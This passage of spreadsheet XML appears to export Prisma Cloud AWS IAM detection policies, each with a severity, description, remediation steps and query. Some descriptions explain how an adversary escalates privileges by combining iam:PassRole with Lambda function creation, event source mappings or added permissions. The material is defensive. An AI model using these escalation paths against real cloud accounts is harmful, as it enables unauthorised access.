          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3155" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3155" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3155" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3155" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3155" t="inlineStr"/>
      <c r="R3155" t="inlineStr"/>
      <c r="S3155" t="inlineStr"/>
      <c r="T3155" t="b">
        <v>1</v>
      </c>
      <c r="U3155" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3155" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3155" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, lambda:CreateEventSourceMapping, and lambda:CreateFunction permissions, an adversary can create a Lambda function with an existing more privileged role and associating it with a DynamoDB table. Then, when a new record is inserted into the table, the Lambda function will trigger with the privilege of the passed in role. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3155" t="inlineStr">
        <is>
          <t>"Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk of Privilege Escalation. If identity requires the use of these permissions to pass a role to a Lambda function, make sure the policy is scoped to only the resources needed. See the following example: https://aws.amazon.com/premiumsupport/knowledge-center/granular-access-lambda/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15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5" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'lambda:CreateEventSourceMapping', 'lambda:CreateFunction') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3155" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3155" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3155" t="inlineStr"/>
      <c r="AD3155" t="b">
        <v>1</v>
      </c>
      <c r="AE3155" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3155" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>07488429-a4dd-4720-99bc-90ceff46550a</t>
        </is>
      </c>
      <c r="AI3155" t="inlineStr">
        <is>
          <t>07488429-a4dd-4720-99bc-90ceff46550a</t>
        </is>
      </c>
      <c r="AJ3155" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3155" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3156">
      <c r="A3156" t="inlineStr"/>
      <c r="B3156" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3156" s="2" t="inlineStr"/>
      <c r="D3156" t="inlineStr"/>
      <c r="E3156" t="inlineStr"/>
      <c r="F3156" t="inlineStr"/>
      <c r="G3156" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3156" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3156" t="inlineStr">
        <is>
          <t>AWS Okta User with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3156" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3156" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3156" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3156" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3156" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3156" t="inlineStr"/>
      <c r="R3156" t="inlineStr"/>
      <c r="S3156" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="T3156" t="b">
        <v>1</v>
      </c>
      <c r="U3156" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3156" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3156" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow Okta users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156" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Login to the Okta console
2. Find the role used by the Okta user
3.  Log in to the AWS console
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7.  Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y315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6"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source.idp.service = 'Okta'</t>
        </is>
      </c>
      <c r="AA3156" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3156" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3156" t="inlineStr"/>
      <c r="AD3156" t="b">
        <v>1</v>
      </c>
      <c r="AE3156" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3156" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>5def0968-e071-46bb-a2b8-4a54f66bcf23</t>
        </is>
      </c>
      <c r="AI3156" t="inlineStr">
        <is>
          <t>5def0968-e071-46bb-a2b8-4a54f66bcf23</t>
        </is>
      </c>
      <c r="AJ3156" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3156" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3157">
      <c r="A3157" t="inlineStr"/>
      <c r="B3157" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3157" s="2" t="inlineStr"/>
      <c r="D3157" t="n">
        <v>0</v>
      </c>
      <c r="E3157" t="n">
        <v>145</v>
      </c>
      <c r="F3157" t="n">
        <v>0</v>
      </c>
      <c r="G3157" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3157" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3157" t="inlineStr">
        <is>
          <t>AWS Administrators with IAM permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3157" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3157" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3157" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3157" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3157" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3157" t="inlineStr"/>
      <c r="R3157" t="inlineStr"/>
      <c r="S3157" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3157" t="b">
        <v>1</v>
      </c>
      <c r="U3157" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3157" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3157" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM Users with Stale IAM Permissions (Unused for 90 days).
Risk of Unused IAM Permissions:
IAM users with any level of permissions (administrative or otherwise) that haven't been used for 90 days pose a security risk because:
Unsecured Access Point: These accounts act like forgotten open doors. If compromised, attackers can exploit them to gain access to AWS resources and perform unauthorized actions, potentially leading to data breaches or financial losses.
Elevated Attack Potential: IAM user permissions can vary widely, with some granting high-level access to modify configurations, create new resources, or manage IAM policies. If compromised, an unused account with such permissions could be devastating.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused IAM users on a regular basis (ideally less than 90 days). Focus on users with any level of permissions, not just administrative privileges.
Principle of Least Privilege: When creating IAM users, assign only the minimum permissions required for them to perform their specific tasks. Regularly review and adjust permissions as needed.
Multi-Factor Authentication (MFA): Enforce MFA for all IAM users to add an extra layer of security and make it significantly harder for attackers to compromise an account, even if they obtain the credentials.
IAM User Access Review: Utilize the AWS IAM Access Review feature to automate the process of identifying and flagging unused accounts for review and potential removal.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging IAM users. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3157"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15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7" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.isadministrative = true and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3157" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3157" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3157" t="inlineStr"/>
      <c r="AD3157" t="b">
        <v>1</v>
      </c>
      <c r="AE3157" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3157" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>888f2731-6748-44a6-bcbc-3718205a7b0e</t>
        </is>
      </c>
      <c r="AI3157" t="inlineStr">
        <is>
          <t>888f2731-6748-44a6-bcbc-3718205a7b0e</t>
        </is>
      </c>
      <c r="AJ3157" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3157" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3158">
      <c r="A3158" t="inlineStr"/>
      <c r="B3158" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3158" s="2" t="inlineStr"/>
      <c r="D3158" t="n">
        <v>0</v>
      </c>
      <c r="E3158" t="n">
        <v>9</v>
      </c>
      <c r="F3158" t="n">
        <v>0</v>
      </c>
      <c r="G3158" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3158" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3158" t="inlineStr">
        <is>
          <t>AWS ECS Task Definition with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3158" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3158" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3158" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3158" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3158" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3158" t="inlineStr"/>
      <c r="R3158" t="inlineStr"/>
      <c r="S3158" t="inlineStr"/>
      <c r="T3158" t="b">
        <v>1</v>
      </c>
      <c r="U3158" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3158" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3158"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158" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS ECS Task Definition service
3. Find the role used by the ECS Task Definition instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y315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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3158" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3158" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3158" t="inlineStr"/>
      <c r="AD3158" t="b">
        <v>1</v>
      </c>
      <c r="AE3158" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3158" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>5d139fe0-bb9d-4d7e-8748-16ea5b7ded43</t>
        </is>
      </c>
      <c r="AI3158" t="inlineStr">
        <is>
          <t>5d139fe0-bb9d-4d7e-8748-16ea5b7ded43</t>
        </is>
      </c>
      <c r="AJ3158" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3158" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3159">
      <c r="A3159" t="inlineStr"/>
      <c r="B3159" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3159" s="2" t="inlineStr"/>
      <c r="D3159" t="inlineStr"/>
      <c r="E3159" t="inlineStr"/>
      <c r="F3159" t="inlineStr"/>
      <c r="G3159" t="b">
        <v>1</v>
      </c>
      <c r="H31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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3159" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3159" t="inlineStr">
        <is>
          <t>AWS Elastic Beanstalk Platform with IAM policy management permissions</t>
        </is>
      </c>
      <c r="L3159" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3159" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3159" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3159" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3159" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3159" t="inlineStr"/>
      <c r="R3159" t="inlineStr"/>
      <c r="S3159" t="inlineStr"/>
      <c r="T3159" t="b">
        <v>1</v>
      </c>
      <c r="U3159" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3159" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3159" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allows an Elastic Beanstalk Platform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159" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the Elasticbeanstalk Platform 
3. Find the role used by the Elasticbeanstalk Platform 
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y315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59"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'elasticbeanstalk' AND source.cloud.resource.type = 'platform'</t>
        </is>
      </c>
      <c r="AA3159" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3159" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3159" t="inlineStr"/>
      <c r="AD3159" t="b">
        <v>1</v>
      </c>
      <c r="AE3159" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3159" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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59" t="inlineStr">
        <is>
          <t>e0c233b7-8911-4ecb-8387-371f0308c168</t>
        </is>
      </c>
      <c r="AI3159" t="inlineStr">
        <is>
          <t>e0c233b7-8911-4ecb-8387-371f0308c168</t>
        </is>
      </c>
      <c r="AJ3159" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3159" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3160">
      <c r="A3160" t="inlineStr"/>
      <c r="B3160" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3160" s="2" t="inlineStr"/>
      <c r="D3160" t="inlineStr"/>
      <c r="E3160" t="inlineStr"/>
      <c r="F3160" t="inlineStr"/>
      <c r="G3160" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3160" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3160" t="inlineStr">
        <is>
          <t>AWS Lambda Layer Version is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3160" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3160" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3160" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3160" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3160" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3160" t="inlineStr"/>
      <c r="R3160" t="inlineStr"/>
      <c r="S3160" t="inlineStr"/>
      <c r="T3160" t="b">
        <v>0</v>
      </c>
      <c r="U3160" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3160" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3160" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Layer Versions with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3160" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Layer Version service
3. Find resource-based policy of the AWS Lambda Layer Version resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3160" t="inlineStr"/>
      <c r="Z3160" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'lambda' AND dest.cloud.resource.type = 'layerVersion' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3160" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3160" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3160" t="inlineStr"/>
      <c r="AD3160" t="b">
        <v>1</v>
      </c>
      <c r="AE3160" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3160" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>90f19fdd-3c90-471f-8ea4-3ce0548c51ad</t>
        </is>
      </c>
      <c r="AI3160" t="inlineStr">
        <is>
          <t>90f19fdd-3c90-471f-8ea4-3ce0548c51ad</t>
        </is>
      </c>
      <c r="AJ3160" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3160" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3161">
      <c r="A3161" t="inlineStr"/>
      <c r="B3161" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3161" s="2" t="inlineStr"/>
      <c r="D3161" t="inlineStr"/>
      <c r="E3161" t="inlineStr"/>
      <c r="F3161" t="inlineStr"/>
      <c r="G3161" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3161" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3161" t="inlineStr">
        <is>
          <t>AWS Elastic Beanstalk Platform with IAM write permissions</t>
        </is>
      </c>
      <c r="L3161" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3161" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3161" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3161" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3161" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3161" t="inlineStr"/>
      <c r="R3161" t="inlineStr"/>
      <c r="S3161" t="inlineStr"/>
      <c r="T3161" t="b">
        <v>1</v>
      </c>
      <c r="U3161" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3161" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3161" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allows an Elastic Beanstalk Platform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161" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the Elasticbeanstalk Platform 
3. Find the role used by the Elasticbeanstalk Platform 
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y316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1"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'elasticbeanstalk' AND source.cloud.resource.type = 'platform'</t>
        </is>
      </c>
      <c r="AA3161" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3161" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3161" t="inlineStr"/>
      <c r="AD3161" t="b">
        <v>1</v>
      </c>
      <c r="AE3161" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3161" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>95d9bf89-5ac0-4b8a-a1ae-a357fe0a45b8</t>
        </is>
      </c>
      <c r="AI3161" t="inlineStr">
        <is>
          <t>95d9bf89-5ac0-4b8a-a1ae-a357fe0a45b8</t>
        </is>
      </c>
      <c r="AJ3161" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3161" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3162">
      <c r="A3162" t="inlineStr"/>
      <c r="B3162" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3162" s="2" t="inlineStr"/>
      <c r="D3162" t="inlineStr"/>
      <c r="E3162" t="inlineStr"/>
      <c r="F3162" t="inlineStr"/>
      <c r="G3162" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3162" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3162" t="inlineStr">
        <is>
          <t>Okta User with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3162" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3162" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3162" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3162" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3162" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3162" t="inlineStr"/>
      <c r="R3162" t="inlineStr"/>
      <c r="S3162" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="T3162" t="b">
        <v>1</v>
      </c>
      <c r="U3162" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3162" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3162" t="inlineStr">
        <is>
          <t>This policy identifies Okta User with AWS IAM permissions that contain '*' in the resource section of the policy statement. The policy will identify those '*' only in case using '*' is not mandatory. Ensure that the AWS policies don't have '*' in the resource section of the policy statement.</t>
        </is>
      </c>
      <c r="X3162" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Login to the Okta console
2. Find the role used by the Okta user
3.  Log in to the AWS console
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7.  Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y316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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.idp.service = 'Okta'</t>
        </is>
      </c>
      <c r="AA3162" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3162" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3162" t="inlineStr"/>
      <c r="AD3162" t="b">
        <v>1</v>
      </c>
      <c r="AE3162" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3162" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>2bb7dada-8013-4278-be40-5149c1d3c000</t>
        </is>
      </c>
      <c r="AI3162" t="inlineStr">
        <is>
          <t>2bb7dada-8013-4278-be40-5149c1d3c000</t>
        </is>
      </c>
      <c r="AJ3162" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3162" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3163">
      <c r="A3163" t="inlineStr"/>
      <c r="B3163" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3163" s="2" t="inlineStr"/>
      <c r="D3163" t="n">
        <v>0</v>
      </c>
      <c r="E3163" t="n">
        <v>124</v>
      </c>
      <c r="F3163" t="n">
        <v>0</v>
      </c>
      <c r="G3163" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3163" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3163" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Lambda create Function &amp; add permissions</t>
        </is>
      </c>
      <c r="L3163" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3163" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3163" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3163" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3163" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3163" t="inlineStr"/>
      <c r="R3163" t="inlineStr"/>
      <c r="S3163" t="inlineStr"/>
      <c r="T3163" t="b">
        <v>1</v>
      </c>
      <c r="U3163" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3163" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3163" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, lambda:AddPermission, and lambda:CreateFunction permissions, an adversary can create a Lambda function with a more privileged existing role. This function could then by updated with lambda:AddPermission to allow another principal in another AWS account the permission to invoke it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3163" t="inlineStr">
        <is>
          <t>Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk
of Privilege Escalation.  If identity requires the use of these permissions to pass a role to a Lambda function, make sure the policy is scoped to only the resources needed.  See the following example:  https://aws.amazon.com/premiumsupport/knowledge-center/granular-access-lambda/
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16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3" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'lambda:AddPermission', 'lambda:CreateFunction') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3163" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3163" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3163" t="inlineStr"/>
      <c r="AD3163" t="b">
        <v>1</v>
      </c>
      <c r="AE3163" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3163" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>dd52863a-1820-4e5b-890a-8a084477c4a1</t>
        </is>
      </c>
      <c r="AI3163" t="inlineStr">
        <is>
          <t>dd52863a-1820-4e5b-890a-8a084477c4a1</t>
        </is>
      </c>
      <c r="AJ3163" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3163" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3164">
      <c r="A3164" t="inlineStr"/>
      <c r="B3164" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3164" s="2" t="inlineStr"/>
      <c r="D3164" t="n">
        <v>0</v>
      </c>
      <c r="E3164" t="n">
        <v>67</v>
      </c>
      <c r="F3164" t="n">
        <v>0</v>
      </c>
      <c r="G3164" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3164" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3164" t="inlineStr">
        <is>
          <t>AWS EC2 with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3164" t="inlineStr">
        <is>
